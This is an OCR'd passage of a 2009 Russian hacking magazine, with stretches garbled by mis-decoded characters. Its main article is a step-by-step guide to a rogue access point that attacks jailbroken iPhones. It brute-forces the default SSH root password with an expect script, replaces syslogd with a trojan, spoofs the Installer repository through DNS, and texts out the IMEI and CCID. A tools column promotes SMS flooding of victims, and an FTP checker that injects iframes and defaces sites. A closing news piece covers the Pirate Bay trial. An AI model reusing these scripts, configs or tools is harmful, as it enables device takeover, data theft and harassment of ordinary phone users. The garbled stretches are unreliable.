àäðåñîâ âûäàâàòü 

option leasetime 1h //âðåìÿ àðåíäû 

àäðåñà, íàäî âûáðàòü â ñîîòâåòñòâèè ñ äèíàìèêîé 

ïåðåìåùåíèÿ òåðìèíàòîðà è êëèåíòîâ 

config dhcp 

option interface wan 

option ignore 1 

Если возникнут вопросы по поводу синтаксиса, обращайся 

к официальной документации http://wiki.openwrt.org/ 

OpenWrtDocs/KamikazeConfiguration (в журнале приводить 

все возможные варианты настроек смысла нет). 

ДЕЛАЙ ДВА. ПОДБОР ПАРОЛЕЙ SSH 

Самая простая и действенная на текущий момент атака на 

iPhone — пользуемся паролем по умолчанию, установленным 

практически на все джеилбрейкнутые телефоны SSHD. 

Для начала, с помощью toolchain от openwrt собираем 

из исходников утилиту expect. Если есть флешка, можно 

XÀÊÅÐ 04 /124/ 09

взлом 

Динамо-машина для зарядки ноутбука. Крути педали, пока не дали… 

поставить компилятор на сам роутер. Устанавливаем все 

необходимое: 

ipkg install buildroot 

ipkg install make 

ipkg install tcl 

ipkg install scponly 

ipkg install openssh-client 

Сразу отредактируем /etc/ssh/ssh_config, добавив 

строчку «StrictHostKeyChecking no», чтобы SSH-клиент 

не выдавал сообщение о принятии новых сессионных 

ключей для каждой жертвы. Затем скачиваем исходники 

expect отсюда: http://expect.nist.gov/expect.tar.gz. 

Распаковываем и собираем, как обычно: ./configure, 

make, make install. Может потребоваться установить 

переменную окружения: «setenv TCL_LIBRARY /usr/ 

bin/tcl8.4.19/Library». Теперь напишем скрипт, который 

будет пытаться подключиться к телефону с дефолтной 

связкой логин-пароль. Получится что-нибудь наподобие 

этого: 

#!/usr/bin/expect 

spawn scp /www/iphone-trojan root@10.0.0.2:/ 

usr/sbin/syslogd 

expect assword {send alpine\r} 

spawn ssh root@10.0.0.2 

expect assword {send alpine\r} 

send “ldid –S /usr/sbin/syslogd\r” 

send “exit\r” 

expect eof 

В случае успеха демон системных логов на захваченном 

телефоне заменится нашей программой iphone-trojan, которая 

будет выполняться при каждом рестарте системы. Что 

это будет за программа, мы рассмотрим ниже. Предлагаю в 

качестве самостоятельного упражнения связать логи dhcpсервера 

с выполнением этого скрипта так, чтобы атака 

осуществлялась на каждый новый выданный IP. Можешь 

также установить nmap и перед запуском проверять, что 

подцепился именно iPhone. 

XÀÊÅÐ 04 /124/ 09 

Делается это командой nmap –O2 10.0.0.Х. Стоит отметить, 

что сканирование nmap’ом занимает приличное 

время, поэтому куда выгоднее просто пытаться атаковать 

сразу после подключения клиента. Тут уж решай сам. 

ДЕЛАЙ ТРИ. ЛОЖНЫЙ РЕПОЗИТОРИЙ INSTALLER 

Эта атака была описана в моей предыдущей статье. Если 

вкратце, — суть заключается в подмене DNS-адреса 

репозитория менеджера пакетов Installer. Менеджер устанавливается 

на все джеилбрейкнутые телефоны, коих, по 

некоторым оценкам, > 50% среди всех iPhone в нашей стране. 

Выглядит это так: пользователь подключается к нашему 

терминатору, открывает Installer и устанавливает обновление 

самого менеджера пакетов. Но вместе с оригинальной 

программой на телефон заливается любая другая. 

Приступим к настройке. Устанавливаем DNS-сервер: 

#~ipkg install maradns 

Меняем настоящий IP сервера с репозиторием i.ripdev.com 

на наш. Для этого редактируем /etc/mararc и /etc/marands/ 

ripdev.com: 

/etc/mararc: 

ipv4_bind_addresses = "127.0.0.1, 10.0.0.1" 

chroot_dir = "/etc/maradns" //ìåñòî, ãäå áóäóò 

ëåæàòü êîíôèãè çîí, ìîæíî âûáðàòü, íàïðèìåð, 

òî÷êó ìîíòèðîâàíèÿ ôëåøêè… 

recursive_acl = "127.0.0.1/8, 10.0.0.0/24" // 

ðàçðåøàåì ðåêóðñèâíûå çàïðîñû 

zone_transfer_acl = "127.0.0.1/8, 

10.0.0.0/24" //ðàçðåøàåì ïåðåñûëêó çîí 

timeout_seconds = 2 

csv1 = {} 

csv1["ripdev.com."] = "ripdev.com" 

dns_port = 53 

maximum_cache_elements = 1024 

min_ttl_cname = 900 

/etc/maradns/ripdev.com: 

dvd 

На диске ты найдешь 

исходники программы 

для отправки SMS. 

067

взлом 

# SOA 

Sripdev.com.|86400|%|root@%|200903211634|7200|3600| 

604800|1800 

# NS 

Nripdev.com.|86400|ns.ripdev.com. 

# A 

Ai.ripdev.com.|86400|10.0.0.1 

Теперь все запросы к серверу будут обработаны терминатором. 

Остается настроить встроенный веб-сервер в качестве поддельного 

репозитория. По умолчанию веб-сервер запускается с корнем /www, 

но ты в любой момент можешь погасить его и запустить с ключом –h / 

my/www-root. Выгодно создавать корень веб-сервера на прикрученной 

флешке. Так или иначе, нам надо скачать и записать на терминатора 

следующие файлы: 

http://i.ripdev.com/info/index-2.0.plist 



В каждом из них исправляем раздел, относящийся к программе Installer, 

меняем ключи date и version на большие. Если мы не хотим вызывать лишних 

подозрений, исправляем ссылки на файлы всех остальных программ так, 

чтобы они вели на настоящий сервер. Для этого указываем явно его IP-адрес. 

Более подробно процесс рассмотрен в уже упомянутой статье «Яблочное 

пюре» в мартовском номере z. Затем скачиваем и правим следующие файлы: 

http://i.ripdev.com/info/com.ripdev.install-4.1- 

2.0.plist 


2.1.plist 


2.2.plist 

Меняем ключ version на такой же, какой поставили в предыдущих 

конфигах. Затем редактируем ключи size и hash. Это размер и md5 хеш 

от файла с нашим поддельным приложением, которое пользователи 

будут себе устанавливать. Остается только разместить само поддельное 

приложение на роутере вместе с конфигами (то есть создать директорию 

/www/info и /www/packages/System), ну и записать туда все вышеописанные 

файлы. 

БОНУС. КОДИМ ПОД IPHONE 

Как будем проверять работоспособность нашего терминатора? А пусть 

сами жертвы известят нас с помощью sms (заодно — получим телефонный 

номер отправителя). Достаточное доказательство? Напишем 

приложение и повесим его демоном на захваченные iPhone. Забудь про 

xcode и Apple SDK, пользоваться будем грубым мужским gcc. Компилятор 

можно поставить прямо на телефон через Cydia. Или на компьютер: 

http://code.google.com/p/iphone-dev/wiki/Building 

http://code.google.com/p/winchain/ 

Отправлять SMS будем через AT команды устройству /dev/tty.debug. 

Эта консоль модема используется для отладки и присутствует на всех 

iPhone/iPhone 3g. Ни одно приложение по умолчанию не использует это 

устройство — то, что доктор прописал! Великий и могучий code.google. 

com уже имеет проект с нужным нам функционалом. Велосипед изобретать 

не будем и некоторые функции просто позаимствуем оттуда: 

http://code.google.com/p/iphone-sms 

Из этого проекта мы возьмем функцию InitConn — подключение к 

модему, CloseConn — отключение от модема, SendCmd — отправка AT команды 

модему и ReadResp — чтение ответа от модема. Приведу пример 

068 

Аккумулятор от ноутбука. Из всех контактов нам понадобятся только два 

значимых строк кода (сам проект можно найти на нашем DVD): 

int InitConn(int speed) 

{ 

int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY); 

if(fd == -1) { 

fprintf(stderr, "%i(%s)\n", errno, strerror(errno)); 

exit(1); 

} 

ioctl(fd, TIOCEXCL); 

fcntl(fd, F_SETFL, 0); 

... 

return fd; 

} 

void CloseConn(int fd) 

{ 

tcdrain(fd); 

tcsetattr(fd, TCSANOW, &gOriginalTTYAttrs); 

close(fd); 

} 

void SendCmd(int fd, void *buf, size_t size) 

{ 

if(write(fd, buf, size) == -1) { 

fprintf(stderr, "SendCmd error. %s\n", 

strerror(errno)); 

exit(1); 

} 

} 

Подумаем над содержанием сообщения. Предлагаю для однозначности 

скидывать с захваченных телефонов ни много, ни мало — а IMEI и CCID. 

Это сделает наши доказательства успешной атаки более весомыми. 

Получать данные мы тоже будем через AT команды. Функцию ReadResp я 

немного допишу, чтобы находить ответы за запросы IMEI и CCID и записывать 

их в переменную message. Выйдет примерно так: 

if (strstr(readbuf,"+CMGW:")!=NULL) { 

smsIndex = atoi(&readbuf[strlen(message)+10]); 

} 

else if (strstr(readbuf,"+CCID:")!=NULL) { 

XÀÊÅÐ 04 /124/ 09

взлом 

Для отладки оборудования, в частности, точек доступа используется разъем JTAG. Производитель не всегда его распаивает 

strncpy(message, &readbuf[17], 20); 

} 

else if (strstr(readbuf,"AT+CGSN")!=NULL) { 

UCHAR temp[15]; 

strncpy(temp, &readbuf[10], 15); 

sprintf(message,"%s-%s",message,temp); 

} 

Осталось лишь написать main функцию, в которую мы 

заложим весь функционал. Сначала получаем CCID, потом 

— IMEI, затем отправляем сообщение. 

Я пытался сделать код как можно понятнее, а не наиболее 

коротким или красивым. Во всяком случае, он работает, а 

оптимизировать будем потом. Собранный вариант вышел 14 

Кб — немало, но этого вполне хватит, чтобы быстро залить 

на жертву через 802.11g. Опять же, оптимизацией займемся 

в следующей статье. Догадайся, что будет, если попытаться 

выполнить наше творение? Отправка SMS, да? Нет, — ничего 

не будет, ядро телефона просто убьет процесс, не дав ему 

ничего исполнить. Хитрость в том, что телефон выполняет 

только подписанные программы. Разработчики хорошо постарались 

на этот счет. Чтобы код работал, надо подписывать 

его перед исполнением на каждом телефоне с помощью 

программы ldid. Она устанавливается вместе со всеми неофициальными 

программами из Cydia. Мы рассчитываем, 

что у нашей жертвы такая программа будет (об остальных 

вариантах поговорим в следующей статье). 

ВОЙНА ВОЙНОЙ, А ПИТАНИЕ ПО РАСПИСАНИЮ 

Нашему терминатору не хватает только автономного источника 

питания. Действительно, стационарная точка доступа — 

это хорошо, а мобильная куда лучше. Существуют два способа 

решить проблему: переносной аккумулятор и адаптер питания 

от автомобильного прикуривателя. Для начала смотрим на 

штатный адаптер питания точки доступа и видим что-нибудь 

похожее на 12 В, 1 А. Автомобильный прикуриватель даст 

как раз 12 В, но мгновенные значения за счет шумов могут 

колебаться от 8 от 16 вольт. Перебои в работе нам не нужны, 

поэтому стоит воспользоваться адаптером с шумоподавителем. 

Схема такого устройства нашлась быстро: 

rlocman.ru/shem/schematics.html?di=33999 

Если не заморачиваться и подключать терминатора после 

зажигания, то можно рискнуть — напрямую подключиться 

к прикуривателю. Также дешево и сердито — воспользоваться 

адаптером от GPS-навигатора, он как раз будет 12 

В, 1 А и с шумами как-нибудь справится. Еще есть вариант 

установить автомобильный адаптер инвертер 12/220 В 

(можно брать от 50 В мощности). Что касается переносных 

аккумуляторов, то подключаться стоит к обычному 

ноутбучному. Подсчитаем: аккумулятор для ноутбука при 

12 В дает 4.8 А/ч — то есть, почти пять часов работы при 

потреблении в 1 А. Отмечу, что это пиковый ток, потребляемый 

точкой. Среднее значение будет меньше, — а значит, 

время работы заведомо больше 5 часов. С аккумулятора 

надо будет снимать только + и -, логические контакты 

оставь в покое. Узнать распайку контактов можно либо по 

наклейке на аккумуляторе, либо с помощью тестера. Надеюсь, 

приведенной здесь информации будет достаточно, 

чтобы запитать терминатора. 

НЕДАЛЕКОЕ БУДУЩЕЕ 

В последнее время производительность и скорость 

подключения к интернету мобильных устройств сильно 

растут. В недалеком будущем, а вернее, уже почти 

настоящем, вырисовываются четкие перспективы мобильных 

ботнетов. Эти устройства практически всегда 

онлайн, имеют несколько способов подключения к 

Сети, при этом — есть GPS-навигация. Они всегда находятся 

рядом со своими владельцами и часто содержат 

конфиденциальную инфу. Я думаю, причин для хака 

более чем достаточно! Сегодня я попытался рассказать, 

как без особых усилий сделать устройство, способное 

получать доступ к Apple iPhone в автоматическом режиме. 

Перемещаясь с таким терминатором по улицам, 

можно собрать целую мобильную армию, готовую в любой 

момент произвести DDoS-атаку или распределено 

вычислить значение хеш-функции. В следующей статье 

я опишу процесс создания трояна для iPhone. Он способен 

получать команды с сервера хозяина, отправлять 

различными способами данные с телефона, выполнять 

шелл-команды, собирать статистику, генерировать 

трафик на определенный ресурс и... что-нибудь еще, 

что успею придумать. z 

info 

•Точка доступа 

обладает рядом 

преимуществ перед 

ноутбуком, например: 

размеры, вес, 

энергопотребление, 

стоимость, разъем 

внешней антенны. 

•В мартовском 

номере z за 2009 

год были описаны 

эксплуатируемые 

атаки. Если остались 

вопросы — перечитай 

подшивку. 

XÀÊÅÐ 04 /124/ 09 

069

взлом 

ЛЕОНИД «R0ID» СТРОЙКОВ 

/ R0ID@BK.RU / 

Программы для хакеров 

>> взлом 

ПРОГРАММА:WEBSMSENDER 

ОС: WINDOWS 2000/XP 

АВТОР:CYLAAAAN 

уже сформированных пакетов SMS-сервису 

для дальнейшей рассылки, тулза умеет: 

1. Ôîðìèðîâàòü ñïàì-ëèñò òåëåôîííûõ 

íîìåðîâ èç ôàéëà 

2. Ôîðìèðîâàòü ëèñò ñ àêêàóíòàìè 

âèäà «ëîãèí:ïàðîëü» äëÿ ñåðâèñà www. 

websms.ru èç ôàéëà, ëèáî âðó÷íóþ 

3. Âåñòè ïîäðîáíûé ëîã íà ïðîòÿæåíèè 

âñåé ñìñ-ðàññûëêè 

Мутим sms-рассылки 

В последнее время sms-рассылки становятся 

все более актуальными. Увы, на большинстве 

биллингов давно введена платная регистрация, 

а паблик-сервисы не позволяют массово отсылать 

сообщения (я уже не говорю о подмене номера 

отправителя). В этой ситуации рекомендую 

тебе обратить внимание на утилу под названием 

«Websmsender». Тулза работает через известный 

смс-сервис — www.websms.ru. Дабы лучше 

понять функциональные особенности утилы, 

рассмотрим сначала возможности sms-сервиса, 

а затем — саму тулзу. Итак, сервис позволяет: 

1. Îòñûëàòü sms-ñîîáùåíèÿ 

2. Àâòîìàòèçèðîâàòü ðàññûëêè 

3. Ïðîèçâîäèòü ïîäìåíó íîìåðà îòïðàâèòåëÿ 

4. Îñóùåñòâëÿòü ðàññûëêè ïî ñîçäàííîìó 

ðàñïèñàíèþ 

5. Ôîðìèðîâàòü ñîáñòâåííóþ ÁÄ ðàññûëîê 

При регистрации на новый аккаунт зачисляются 

пять бесплатных sms — для теста (правда, 

без возможности подмены номера отправителя). 

Если ограничения тебя не устраивают — 

прейскурант в студию, а именно: от 10 до 1к SMS 

по цене в 1.4 рубля, от 1к до 3к приобретаемых 

SMS — по 1.3 рубля за каждое сообщение и т.д. 

Теперь рассмотрим программу, с помощью 

которой мы и будет рассылать сообщения, либо 

флудить недоброжелателей. Кроме отправки 

Плюс ко всему — отдельное меню настроек, 

таких как: номер отправителя, количество 

сообщений, отправляемых на каждый номер, 

и время доставки SMS. Последняя функция 

особенно удобна при флуде часа в 2-3 ночи, по 

часовому поясу жертвы :). 

В общем, — иные способы sms-спама никто не 

отменял, но чем не вариант, да еще и с бесплатными 

тестовыми смс-ками? 

P.S. Учитывая, что все sms-сервисы со временем 

начинают «закручивать гайки», советую 

поспешить и полноценно заюзать тулзу. 

ПРОГРАММА: CHARON 

ОС: WINDOWS 2000/XP 

АВТОР: RHINO 

Прокси/соксы — неотъемлемая часть безопасного 

веб-серфинга (полагаю, об этом не стоит и 

напоминать). Собрать прокси-лист — несложно, 

сложно — качественно его прочекать по 

заданным параметрам. В прошлых выпусках 

X-Tools я не раз знакомил тебя с утилами, призванными 

облегчить проверку прокси/соксов 

на живучесть. Тем не менее, хочу обратить внимание 

на еще одну — под названием Charon. 

Если ты активно юзаешь эту софтину, то без 

труда поймешь меня, а если еще нет — поверь 

на слово, тулза заслуживает особого внимания. 

Прога позволяет чекать работоспособность, 

функциональность и анонимность проксиков 

по необходимым тебе параметрам. Среди функциональных 

особенностей утилы отметим: 

— Óïðàâëåíèå íàñòðîéêàìè ñîåäèíåíèÿ 

(êîëè÷åñòâî ïîòîêîâ/ïîðòû/etc) 

— Ìíîãîóðîâíåâàÿ ôèëüòðàöèÿ IP-àäðåñîâ 

(ïî àäðåñó/ïîðòó/ñòðàíå/etc) 

— Âîçìîæíîñòü èìïîðòà/ýêñïîðòà 

ïðîêñè-ëèñòîâ 

Чекаем прокси-листы 

— Âçàèìîäåéñòâèå ñî ñïèñêàìè ñåòåâûõ 

ñêàíåðîâ «AngryIPScanner» 

è «Superscanner» ïðè ñîñòàâëåíèè 

ïðîêñè-ëèñòîâ 

— ×åêèíã ïðîêñèêîâ ïðè ïîìîùè RBLñåðâèñîâ 

(Realtime Blackhole List) 

— Àâòîìàòè÷åñêèé ïîèñê ïàáëèê-ëèñòîâ 

ïðè ïîìîùè ïîèñêîâûõ ñèñòåì 

— Ïðîâåðêà ðàçëè÷íûõ òèïîâ ïðîêñèêîâ 

(http/ssl/socks4/5) 

— Ïðîâåðêà ñêîðîñòè ñîåäèíåíèÿ 

ïðîêñè-ñåðâåðà 

— Âîçìîæíîñòü ñîçäàíèÿ è âåäåíèÿ 

áëåê-ëèñòà ïðîêñèêîâ 

— Íàëè÷èå áàçû GeoIP, ÷òî ïîçâîëÿåò 

êîððåêòíî îïðåäåëÿòü ñòðàíû, â êîòîðûõ 

ðàñïîëàãàþòñÿ ïðîêñè 

— Íàëè÷èå ðóñèôèöèðîâàííîé âåðñèè 

(îòäåëüíîå thx to v1ru$, — Ïðèì. 

àâòîðà) 

P.S. Смело сливаем утилиту с нашего DVD. 

ПРОГРАММА: FTP-CHECK TOOLZ 

ОС: *NIX/WIN 

АВТОР: JENIZIX 

Несмотря на обилие различных FTP-чекеров, 

потребность в надежном и стабильном продукте 

остается. Посему предлагаю расширить 

выбор еще одной утилой: «ftp-check toolz». 

Тулза представляет собой классический чекер 

фтп-акков с расширенными возможностями. 

Начнем, как водится, с возможностей софтины: 

— ×åêèíã íà âàëèäíîñòü FTP-àêêàóíòîâ 

— Ìîäèôèêàöèÿ index-ôàéëîâ, êàê 

70 

XÀÊÅÐ 04 /124/ 09

взлом 

ПРОГРАММА: [XDS] TDS 

ОС: *NIX/WIN 

АВТОР: XADDIS 

Чекаем фтп-акки 

ïîëíîñòüþ, òàê è ñ äîáàâëåíèåì 

iframe-âñòàâêè 

— Àïëîàä ïðîèçâîëüíîãî ôàéëà íà ñåðâåð 

â êîðåíü âåá-êàòàëîãà 

— Âîçìîæíîñòü çàãðóçêè ôàéëà ñ ôòïàêêàóíòàìè 

äëÿ ïðîâåðêè ÷åðåç âåáèíòåðôåéñ 

÷åêåðà 

— Ïîëó÷åíèå èíôîðìàöèè î ñèñòåìå 

(ðàáîòàåò íå âñåãäà è íå âåçäå) 

— Âîçìîæíîñòü ïðèîñòàíîâêè ïðîâåðêè 

ñ ïîñëåäóþùèì åå ïðîäîëæåíèåì (óæå 

ïðî÷åêàííûå àêêàóíòû ïðîâåðÿòüñÿ ïî 

âòîðîìó ðàçó íå áóäóò) 

— Ïîëíîå ëîãèðîâàíèå, âêëþ÷àÿ: 

1. FTP_valid.txt — âàëèäíûå àêêè 

2. FTP_invalid.txt — íåâàëèäíûå àêêè 

3. FTP_defaced.txt — «çàäåôåéñåííûå» àêêè 

4. FTP_unknown.txt — îøèáêà ñîåäèíåíèÿ 

ñ ñåðâåðîì 

5. FTP_info.txt — àêêè, ñ ïîìîùüþ 

êîòîðûõ óäàëîñü ïîëó÷èòü èíôîðìàöèþ 

î ñèñòåìå 

— Ïîääåðæèâàåòñÿ ñòàíäàðòíûé âèä 

ôòï-àêêàóíòîâ èç ëîãîâ/êîíôèãîâ: 

«ftp://login:pass@server» èëè 

«login:pass@server» 

Для работы скрипта потребуется PHP не ниже 4 

версии, а также chmod 777 на каталог, в котором 

лежит чекер. Скрипт прекрасно работает на 

бесплатных хостингах, правда, со скоростью 

1-2 акка в секунду. Для увеличения скорости 

рекомендуется использовать чекер на сервере 

с более широким каналом. 

ПРОГРАММА: GUARDMOBILE 

ОС: WINDOWS MOBILE 5/6 

АВТОР:MASPWARE 

Тебе никогда не приходила мысль установить 

бэкдор в собственный мобильник? Софтина 

«GuardMobile» рассчитана на коммуникаторы 

под управлением Windows Mobile и призвана 

защитить не только твой девайс, но и информацию 

на нем. Даже если твой мобильник будет 

украден или утерян, ты все равно сможешь: 

— Âêëþ÷èòü òðåâîãó (çâóêîâóþ/âèáðàöèîííóþ) 

è çàáëîêèðîâàòü äåâàéñ 

— Óñòàíîâèòü ìåñòîïîëîæåíèå ñâîåãî 

àïïàðàòà (ïðè íàëè÷èè GPS-ïðèåìíèêà) 

— Ñäåëàòü õàðä-ðåñåò è óäàëèòü âñþ 

èíôîðìàöèþ ñ ìîáèëüíèêà 

— Óäàëåííî ïîçâîíèòü ñî ñâîåãî 

äåâàéñà â ôîíîâîì ðåæèìå (àíàëîã 

ïðîñëóøêè) 

Нужно лишь заинсталить утилиту на свой мо- 

XÀÊÅÐ 04 /124/ 09 

Защищаем коммуникатор 

бильник и задать ряд настроек. Тулза попросит 

установить PIN-код и добавить несколько номеров 

мобильных телефонов, с которых можно 

будет управлять девайсом. После активации 

утила незаметно начнет работать в фоновом 

режиме до тех пор, пока не получит команды на 

совершение какого-либо действия. 

Из возможностей софтины можно выделить: 

— Ìàëûé ðàçìåð 

— Çàïóñêàåòñÿ è ðàáîòàåò â ôîíîâîì 

ðåæèìå. 

— Îñòàåòñÿ ðàáîòîñïîñîáíîé äàæå 

ïîñëå ñîôò-ðåñåòà 

— Ìîæåò áûòü ïîëíîñòüþ óäàëåíà òîëüêî 

âëàäåëüöåì 

— Îïðåäåëåíèå ìåñòîïîëîæåíèÿ ñ ïîìîùüþ 

GPS-ïðèåìíèêà 

— Àêòèâàöèÿ/äåàêòèâàöèÿ áëîêèðîâêè 

ýêðàíà 

— Àêòèâàöèÿ/äåàêòèâàöèÿ áëîêèðîâêè 

êëàâèàòóðû 

— Ðåæèì òðåâîãè (ãðîìêèé çâóê è âèáðàöèÿ) 

— Îáðàòíûé âûçîâ 

— Ñîôò-ðåñåò/õàðä-ðåñåò äëÿ ÷àñòè÷íîãî 

è ïîëíîãî óäàëåíèÿ äàííûõ ñ 

ìîáèëüíèêà 

— Óâåäîìëåíèå î ñìåíå SIM-êàðòû 

— Âåäåíèå ïîëíîãî ëîãà ñîáûòèé 

Как ты уже понял, утила абсолютно не 

зависит от симки, вставленной в телефон. 

Ведь работает она под мобильной версией 

Винды. Сменят симку или нет — разницы 

никакой, в твоих руках останется управление 

утерянным девайсом с помощью вот 

этих команд: 

locate : Ïîïûòàòüñÿ îïðåäåëèòü ìåñòîïîëîæåíèå 

óñòðîéñòâà 

lock : Çàáëîêèðîâàòü ýêðàí 

unlock : Ðàçáëîêèðîâàòü ýêðàí 

keylock : Çàáëîêèðîâàòü êëàâèàòóðó 

alarmon : Âêëþ÷èòü çâóêîâóþ òðåâîãó 

è âèáðàöèþ 

alarmoff : Âûêëþ÷èòü òðåâîãó 

callback : Çàñòàâèòü òåëåôîí ïåðåçâîíèòü 

òåáå 

softreset/hardreset : çäåñü, äóìàþ, 

ïîíÿòíî :) 

Общий вид синтаксиса команд выглядит так: 

#PIN#команда. 

В общем, если ценишь свой мобильный девайс 

— эта утила для тебя :). 

Конфигурируем систему управления трафиком 

О распределении трафика мы уже писали 

(полистай подшивку z). В нынешнем выпуске 

хочу представить тебе систему управления 

трафиком под названием [XDS] TDS. Система 

написана на PHP, и ее установка не вызовет у 

тебя никаких проблем. Достаточно следовать 

простому алгоритму действий: 

— Çàëèâàåì âñå ôàéëû èç àðõèâà ñ 

òóëçîé íà ñåðâåð 

— Ñòàâèì íà ïàïêó ñ ôàéëàìè ÷ìîä 777 

— Íàñòðàèâàåì config.php ïîä ñâîè 

íóæäû 

О конфиге более подробно: 

### Äèðåêòîðèÿ þçåðîâ ### 

$usersdir='users'; 

### Ôàéë âñåõ ïîñåùåíèé ### 

$clickf='clicks.txt'; 

### Ôàéë óíèêàëüíûõ ïîñåùåíèé ### 

$unicf='unics.txt'; 

### Ôàéë áëîêèðîâêè ### 

$blockf='blocked'; 

### Ôàéë âðåìåíè çàïóñêà ñòàòû ### 

$startf='start.txt'; 

### Ôàéë ñ ïðåäûäóùèìè çíà÷åíèÿìè 

ñòàòû ### 

$prevf='previous.txt'; 

### Ôàéë ðåäèðåêòà ### 

$redf='redir.txt'; 

### Àäðåñ äëÿ ðåäèðåêòà ïî óìîë÷àíèþ 

### $host='http://www.site.com'; 

### Àäðåñ äëÿ ðåäèðåêòà íåóíèêîâ ### 

# $hostn='http://www.sites.com'; 

### Ïàðîëü äëÿ äîñòóïà ê ñòàòå ### 

$passw='123'; 

Теперь обновляем конфиг на сервере и 

вперед: 

— Ïóñêàåì âåñü òðàôô íà ñêðèïò 

iframe.php 

— Äëÿ ïðîñìîòðà ñòàòèñòèêè çàïóñêàåì 

ñêðèïò stat.php 

Вот, собственно, и все. Система проста 

в администрировании и удобна в 

использовании.z 

71

сцена 

МАРИЯ «MIFRILL» НЕФЕДОВА 

/ MIFRILL@RIDDICK.RU / 

МЕДИА-МАГНАТЫ ПРОТИВ BITTORRENT 

Судебный процесс по 

делу The Pirate Bay 

Всемирная паутина — настоящее благо для всего прогрессивного человечества, но для правообладателей это форменный кошмар. Пиратство 

XXI века, совсем не похожее на пиратство былых времен, в основном разворачивается в виртуальном пространстве, и как именно с ним бороться, 

до хрипоты спорят аналитики по всему миру. Но пока одни теоретизируют, другие предпочитают действовать. Судебный процесс по делу крупнейшего 

торрент-трекера планеты, — ThePirateBay.org — развернувшийся в Швеции, пожалуй, оставит заметный след в истории интернета. Еще бы, 

на этот раз пираты имеют все шансы выиграть. 

занимается ничем противозаконным, скорее, 

просто объединяет единомышленников, 

жаждущих бороться с системой. Вот и создание 

торрент-трекера «Пиратское бюро» одобрило 

и осуществило, но уже в 2004-м отправило его 

в свободное плавание. С тех пор TPB является 

независимым ресурсом. 

На протяжении последних лет трекер поддерживают 

три шведских парня, имена которых 

теперь прекрасно известны всему миру: это 

Готтфрид Свартхольм (Gottfrid Svartholm aka 

«anakata»), Фредерик Нейж (Fredrik Neij aka 

Свартхольм и Сунди на пресс-конференции 

Нейдж (слева) и Сунди (справа) в здании суда 

«В ШВЕЦИИ ВОЗНИКЛА ПИРАТСКАЯ ПАР- 

ТИЯ, ЕДИНСТВЕННЫЙ ПУНКТ ПРОГРАММЫ 

КОТОРОЙ — ЛЕГАЛИЗАЦИЯ СВОБОДНОГО 

КОПИРОВАНИЯ ВИДЕО И АУДИОМАТЕРИА- 

ЛОВ ИЗ ИНТЕРНЕТА». 

Перед тем как перейти 

непосредственно 

к хронике процесса, 

стоит сказать 

о самом трекере, 

оказавшемся между 

молотом и наковальней. 

Хотя вряд 

ли найдутся такие, 

кому незнаком 

адрес ThePirateBay.org – сокращенно TPB, а 

по-русски – «Пиратская бухта». Трекер зародился 

еще в 2003 году под эгидой шведской 

организации Piratbyran («Пиратское бюро»). 

Бюро активно выступает против ситуации, сложившейся 

вокруг интеллектуальной собственности 

и ратует за свободу обмена информацией. 

Притом сама организация, разумеется, не 

«TiAMO») и Питер Сунде Колмисоппи (Peter 

Sunde Kolmisoppi aka «brokep»). Вот они-то 

и «попали под раздачу» вместе с владельцем 

хостинга — 48-летним бизнесменом Карлом 

Лундстремом (Carl Lundstrom). 

Применить санкции в отношении «Пиратской 

бухты» пытаются уже давно. Еще в 2006-м году 

сервера трекера отключали и арестовывали, 

притом сделано это было практически по 

прямой указке Соединенных Штатов. Тогда 

голливудские магнаты решили преподать урок 

европейским корсарам, и, избрав своей мишенью 

TPB, надавили на нужные рычаги. К делу 

подключили тяжелую артиллерию — Вашингтон, 

правоохранительные органы, ФБР и так 

далее. В итоге, власти Швеции сочли нужным 

прислушаться к мнению Запада и произвели 

образцово-показательную конфискацию серверов 

(включая те, на которых тогда располагалось 

«Пиратское бюро»). Но вся соль в том, 

что по шведским законам TPB – совершенно 

легален, а законодательство США никакой 

силы в Европе не имеет. 

Скандал разразился нешуточный: на правительственные 

сайты Швеции не замедлили 

обрушиться DDoS-атаки и взломы от хакеров со 

всего мира, и быстро стало ясно, что конфликт 

носит политический и идеологический характер. 

Например, именно из-за того инцидента в 

Швеции возникла Пиратская партия, единственный 

пункт программы которой — легализация 

свободного копирования видео- и аудиоматериалов 

из интернета. А так как в Швеции 

очень много людей, недовольных нынешней 

ситуацией с копирайтами, наличествовали и 

072 

XÀÊÅÐ 04 /124/ 09

сцена 

уличные демонстрации и прочие «стандартные 

атрибуты». 

Тогда, в 2006-м, под давлением общественного 

мнения, власти были вынуждены вернуть сервера 

владельцам (разумеется, проведя перед 

этим тщательные проверки). Самих админов не 

забыли допросить, после чего тоже отпустили 

на все четыре стороны. Однако трекер, конечно, 

не перестал быть бельмом на глазу у крупнейших 

медиа-холдингов, и было очевидно, что 

рано или поздно история получит продолжение, 

тем более, на руках властей осело столько 

улик. Так и случилось. 

РАССТАНОВКА СИЛ С одной стороны, с 

прогрессом бороться невозможно, особенно 

когда все настолько «запущено», как в случае с 

p2p-сетями. С другой, – очень хочется, и никто 

не мешает попробовать (плюс, прецеденты с 

Napster, Audiogalaxy или KaZaA сулят успех). 

Технология BitTorrent сейчас находится в 

зените славы, и «закрыть торренты» — голубая 

мечта всех гигантов медиа-индустрии. 

«Пиратскую бухту» выбрали мишенью тоже 

совсем не случайно, ведь этот трекер, пожалуй, 

можно назвать «лицом технологии» — торрентресурсов 

много, но TPB крупнейший. Вдумайся 

Питер Сунди 

Адвокат защиты Пер Самуэльсон, автор 

«защиты Кинг-Конга» 

XÀÊÅÐ 04 /124/ 09 

в эти цифры: на момент окончания 2008 года 

TPB мог похвастаться более чем 3 миллионами 

зарегистрированных пользователей, более чем 

25 миллионами уникальных пиров, а на сайте 

Alexa Internet трекер занимает 107 место. 

Админы TPB — ребята не из пугливых. К ним 

не раз и не два обращались представители 

Microsoft, Apple, SEGA, DreamWorks, Warner 

Bros и других динозавров рынка, но администрация 

всегда и всем отвечала решительным 

отказом. Ни одна раздача не была удалена с 

трекера по просьбе правообладателей, такова 

принципиальная позиция админов. Кстати, историю 

переписки команды сайта с различными 

компаниями и инстанциями можно почитать по 

адресу thepiratebay.org/legal, правда, для этого 

потребуется знание английского языка. Отметим, 

что наглости и чувства юмора админам не 

занимать — многие письма носят откровенно 

издевательский характер. Отвечавший на 

e-mail Свартхольм не стеснялся в выражениях, 

объясняя разгневанным магнатам, что 

в Швеции законы США — пустой звук. При 

таком подходе неудивительно, что «Пиратская 

бухта» для сетевой публики стала настоящим 

символом информационной свободы, а для 

правообладателей — кандидатом номер один 

